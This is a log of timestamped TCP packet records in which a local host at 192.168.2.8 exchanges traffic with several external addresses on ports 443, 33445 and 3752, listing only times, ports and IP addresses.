Oct 8, 2024 20:52:19.987497091 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:20.902079105 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:20.902095079 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:20.908137083 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:20.968473911 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:21.056376934 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:21.056395054 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:21.056792021 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:21.109931946 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:21.925766945 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:21.971546888 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.158097982 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.158143997 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.158159971 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.158176899 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.158202887 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.158219099 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.159101963 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:22.159117937 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.159126997 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.159157038 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.159174919 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.160270929 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:22.160593033 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:22.938378096 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:22.938409090 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:22.938421011 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:22.938426971 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:28.851963043 CEST	49709	33445	192.168.2.8	130.133.110.14
Oct 8, 2024 20:52:28.852001905 CEST	49710	33445	192.168.2.8	194.249.212.109
Oct 8, 2024 20:52:28.898638010 CEST	33445	49710	194.249.212.109	192.168.2.8
Oct 8, 2024 20:52:28.898663044 CEST	33445	49709	130.133.110.14	192.168.2.8
Oct 8, 2024 20:52:29.315632105 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:29.543133974 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:29.543406963 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:29.543440104 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:29.550720930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.201843977 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.203130960 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.208811998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.441874027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.444865942 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.450092077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.723062038 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.724951029 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.724976063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.727655888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.727672100 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.727684975 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.727915049 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.728101015 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.728132963 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.728200912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.731420994 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.731798887 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.736593008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.736609936 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.736622095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.737045050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.737118959 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.739418983 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.811718941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.811739922 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.811841965 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.821527958 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.821542978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.821554899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.821721077 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.825416088 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.825428963 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.825440884 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.825480938 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.825557947 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.833427906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.833451986 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.833462954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.834619045 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.840620995 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.840667963 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.840683937 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.841192961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.841202974 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.841242075 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.848871946 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.848886013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.848897934 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.848939896 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.848969936 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.879770041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.879782915 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.879795074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.880050898 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.885009050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.885081053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.885180950 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.885246038 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.885301113 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.885407925 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.913101912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.913141012 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.913152933 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.913300991 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.913300991 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.913707972 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.913779020 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.913789988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.913803101 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.913908958 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.914211035 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.914259911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.914273024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.914952993 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.916990042 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.917042971 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.917057037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.917113066 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.917222023 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.917301893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.917321920 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.917332888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.917613983 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.922941923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.922956944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.922975063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.923115969 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.923362017 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.924341917 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.924355984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.924367905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.924490929 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.930723906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.930758953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.930772066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.930880070 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.930880070 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.938409090 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.938457012 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.938468933 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.939088106 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.946301937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.946317911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.946332932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.947042942 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.953264952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.953284979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.953300953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.953399897 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.959580898 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.959595919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.959610939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.959798098 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.966706038 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.966725111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.966746092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.966877937 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:30.997198105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.997231960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.997273922 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.997298956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.997323036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.999461889 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.999475002 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.999489069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.999794960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.999821901 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:30.999835014 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.001636028 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.001754999 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.002182961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.002197981 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.002211094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.002266884 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.009217024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.009263039 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.009278059 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.009685040 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.012697935 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.012732983 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.012748003 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.023406982 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.024158001 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.024171114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.024183989 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.024406910 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.027766943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.027784109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.027796030 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.032537937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.032561064 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.032572985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.033571005 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.034168005 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.035125017 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.035182953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.035195112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.035275936 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.038763046 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.038806915 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.038817883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.039271116 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.041358948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.041372061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.041383028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.041394949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.041555882 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.041555882 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.043272972 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.044230938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.044243097 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.044889927 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.045850039 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.045874119 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.045885086 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.045938015 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.046063900 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.048525095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.048538923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.048552990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.050117016 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.051619053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.051635027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.051646948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.051739931 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.052347898 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.054176092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.054188013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.054193974 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.054310083 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.057600975 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.057611942 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.057712078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.057735920 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.057787895 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.057804108 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.063076019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.063088894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.063100100 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.063340902 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.063354015 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.063368082 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.063416004 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.063416004 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.063416004 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.064992905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.065005064 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.065011024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.065099955 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.095745087 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.095758915 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.095772982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.095813990 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.099546909 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.099560022 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.099572897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.099664927 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.099706888 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.099724054 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.099736929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.099749088 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.099791050 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.100327015 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.100389957 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.100403070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.100409985 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.100639105 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.100963116 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.100986958 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.101032972 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.101083040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.101797104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.101808071 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.101819992 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.101833105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.101876020 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.102161884 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.102459908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.102502108 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.102514982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.102520943 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.102628946 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.103274107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.103296041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.103310108 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.103349924 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.103588104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.103626966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.103638887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.103657007 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.103712082 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.104435921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.104517937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.104557991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.104568958 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.105964899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.105988979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.106043100 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.106098890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.106120110 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.106153011 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.109751940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.109776020 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.109791040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.111411095 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.114103079 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.114156961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.114170074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.114229918 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.114243984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.114281893 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.114367008 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.117537975 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.117549896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.117562056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.117574930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.117594957 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.117626905 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.120343924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.120357990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.120371103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.120786905 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.120786905 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.127461910 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.127509117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.127521992 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.127760887 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.132381916 CEST	3752	49716	147.45.126.71	192.168.2.8
